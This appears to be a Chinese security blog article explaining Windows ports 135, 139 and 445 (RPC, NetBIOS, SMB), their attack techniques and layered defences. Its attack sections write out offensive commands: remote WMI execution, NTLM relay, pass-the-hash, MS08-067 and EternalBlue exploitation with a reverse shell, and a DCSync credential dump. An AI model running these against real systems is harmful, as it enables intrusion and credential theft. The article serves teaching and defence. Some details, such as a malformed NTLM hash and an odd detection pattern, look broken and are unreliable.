Windows核心端口攻防全解析：135、139、445端口的技术内幕与安全实践

Windows核心端口攻防全解析：135、139、445端口的技术内幕与安全实践

引言：Windows网络通信的命脉

在Windows网络生态系统中，135、139和445端口犹如网络通信的"大动脉"，承载着关键的系统服务和网络功能。这些端口不仅是正常业务运行的基础，也是攻击者最常瞄准的目标。本文将深入解析这三个核心端口的技术原理、渗透利用手法及防御策略，为安全从业人员提供全面的参考指南。

端口135：RPC服务的神经中枢

技术原理深度剖析

135端口是DCE/RPC（分布式计算环境/远程过程调用）服务的端点映射器，扮演着网络服务"调度中心"的角色。与一般服务端口不同，135端口本身并不直接提供功能服务，而是作为客户端与各种RPC服务之间的中介：

服务注册机制：Windows系统中的各类RPC服务（如WMI、事件日志、计划任务等）启动时会向RPC端点映射器注册自己监听的动态端口

动态端口分配：每次系统重启，这些RPC服务可能分配到不同的端口（通常在49152-65535范围内）

客户端查询流程：客户端只需知道目标服务器的IP和所需服务的唯一标识符（UUID），即可通过135端口获取实际服务端口

Client Port135 DynamicPort 查询WMI服务端口(UUID) 响应动态端口号(如54321) 连接WMI服务 提供WMI服务 Client Port135 DynamicPort

渗透测试实用技巧

作为红队成员，135端口提供了丰富的攻击面：

服务枚举与信息收集：

bash

复制代码

# 使用impacket工具包中的rpcdump.py

rpcdump.py 192.168.1.10 | grep -i 'MS-RPRN\|MS-PAR'

WMI远程命令执行：

powershell

复制代码

# 通过WMI执行远程命令

wmic /node:192.168.1.10 process call create "cmd.exe /c whoami > C:\output.txt"

DCOM横向移动：

bash

复制代码

# 使用dcomexec.py进行DCOM攻击

dcomexec.py domain/user:password@192.168.1.10 -object MMC20

MS-RPRN打印机漏洞利用：

bash

复制代码

# 利用Print Spooler服务进行域控攻击

dementor.py -d domain -u user -p password 192.168.1.10 192.168.1.20

企业级防御方案

针对135端口的防护需要分层实施：

网络层控制：

在边界防火墙限制135端口的入站连接

内部网络实施分段隔离，限制RPC通信范围

系统层加固：

powershell

复制代码

# 禁用不必要的RPC服务

Set-Service -Name "RemoteRegistry" -StartupType Disabled

Set-Service -Name "Spooler" -StartupType Disabled

监控与检测：

记录异常RPC端点查询行为

监控非标准动态端口上的RPC连接

端口139：NetBIOS的遗产与风险

技术架构详解

139端口是NetBIOS会话服务的标准端口，属于NetBIOS over TCP/IP（NBT）协议栈的一部分。完整的NetBIOS三件套包括：

端口

协议

功能描述

137/UDP

NetBIOS名称服务

主机名解析（类似DNS）

138/UDP

NetBIOS数据报服务

无连接通信（广播消息）

139/TCP

NetBIOS会话服务

面向连接的SMB通信

在Windows 2000之前的系统中，文件共享完全依赖这套机制。典型的通信流程：

客户端通过137端口解析目标主机名

建立139端口的TCP会话连接

在会话通道上运行SMB协议进行文件操作

历史漏洞与现代利用

虽然现代系统已转向直接SMB（445端口），但某些场景下139端口仍可能被利用：

传统系统攻击：

bash

复制代码

# 针对Windows XP系统的空会话攻击

enum4linux -a -u "" -p "" 192.168.1.20

NetBIOS名称欺骗：

bash

复制代码

# 使用responder工具进行NBT-NS欺骗

responder -I eth0 -wFb

SMBv1漏洞利用：

bash

复制代码

# 利用MS08-067漏洞

msfconsole -x "use exploit/windows/smb/ms08_067_netapi; set RHOST 192.168.1.20; exploit"

现代化防护策略

对于仍需要支持传统系统的环境：

协议升级：

powershell

复制代码

# 禁用SMBv1（影响139和445端口）

Disable-WindowsOptionalFeature -Online -FeatureName smb1protocol

访问控制：

bash

复制代码

# Windows防火墙规则示例

netsh advfirewall firewall add rule name="Block NetBIOS" dir=in action=block protocol=TCP localport=139

网络隔离：

将传统系统置于独立VLAN

配置交换机端口安全策略

端口445：现代SMB的攻防战场

SMB协议演进与安全特性

445端口承载的SMB协议经历了多个版本迭代：

版本

引入时间

安全改进

SMBv1

1980年代

无加密，NTLM认证

SMBv2

2006(Vista)

性能提升，基本安全

SMBv3

2012(Win8)

AES加密，完整性检查

现代SMB的核心功能包括：

文件与打印机共享

远程服务管理（SCM）

命名管道（IPC$）通信

分布式文件系统（DFS）

高级攻击手法

445端口是内网横向移动的主要通道，红队常用技术包括：

永恒之蓝利用链：

bash

复制代码

# 自动化利用框架

python eternalblue_exploit7.py 192.168.1.30 windows/shell_reverse_tcp 4444

Pass-the-Hash攻击：

bash

复制代码

# 使用pth-winexe工具

pth-winexe -U admin%aad3b435b51404eeaad3b435b51404ee:cc36cf7a8514893efccd3324464tkg1 //192.168.1.30 cmd

SMB中继攻击：

bash

复制代码

# 使用impacket的ntlmrelayx

ntlmrelayx.py -t smb://192.168.1.40 -c "whoami"

Kerberos降级攻击：

bash

复制代码

# 强制使用NTLM认证

responder -I eth0 -A --disable-ess

企业级防护体系

构建纵深防御策略：

协议配置强化：

powershell

复制代码

# 启用SMB签名（域控制器默认开启）

Set-SmbServerConfiguration -RequireSecuritySignature $true -Force

认证保护：

powershell

复制代码

# 限制NTLM使用

New-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0\" -Name "RestrictSendingNTLMTraffic" -Value 2

网络微分段：

bash

复制代码

# 示例：仅允许特定服务器访问域控的445端口

New-NetFirewallRule -DisplayName "Allow SMB to DCs" -Direction Inbound -LocalPort 445 -Protocol TCP -Action Allow -RemoteAddress 10.0.1.0/24

高级检测规则：

sql

复制代码

/* SIEM检测规则示例：异常SMB登录 */

SELECT * FROM security_events

WHERE event_id = 4624 AND logon_type = 3

AND process_name LIKE '%\\sbm%'

AND src_ip NOT IN (SELECT ip FROM asset_db WHERE type = 'workstation')

端口协同攻击与防御案例分析

典型攻击路径重现

场景：攻击者从初始入侵到域控提权

信息收集阶段：

bash

复制代码

# 扫描发现开放135、445端口的系统

nmap -p 135,139,445 -sV 192.168.1.0/24

初始突破：

bash

复制代码

# 利用MS17-010攻击文件服务器

python eternalblue.py 192.168.1.50

横向移动：

bash

复制代码

# 通过WMI收集域信息

wmiexec.py domain/user:password@192.168.1.100

权限提升：

bash

复制代码

# DCSync攻击获取域控凭证

secretsdump.py -just-dc domain/user:password@192.168.1.200

综合防御方案

构建多层防御体系：

网络架构设计：

实施三层网络架构（核心、分布、接入）

部署私有VLAN隔离敏感系统

端口访问矩阵：

端口

允许访问源

认证要求

日志记录

135

管理子网

Kerberos

详细

139

无

无

拒绝

445

业务子网

SMBv3

详细

终端防护配置：

powershell

复制代码

# 应用控制策略示例

Set-MpPreference -AttackSurfaceReductionRules_Ids 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 -AttackSurfaceReductionRules_Actions Enabled

未来演进与替代方案

随着网络安全要求的提高，微软正推动现代替代方案：

SMB over QUIC：基于UDP的安全传输

Windows Admin Center：HTTPS-based管理

Just Enough Administration：精细化权限控制

管理员应考虑逐步迁移：

powershell

复制代码

# 启用Windows远程管理（5985/5986）

Enable-PSRemoting -Force

Set-Item WSMan:\localhost\Service\EnableCompatibilityHttpsListener -Value $true

结语：安全平衡的艺术

Windows核心端口的管理需要在功能与安全之间寻求平衡。通过理解底层技术原理、掌握攻击手法、实施分层防御，企业可以构建更安全的网络环境。建议定期进行：

端口使用情况审计

攻击模拟测试

安全配置基线检查

只有持续关注这三类核心端口的安全状态，才能有效防御日益复杂的网络攻击。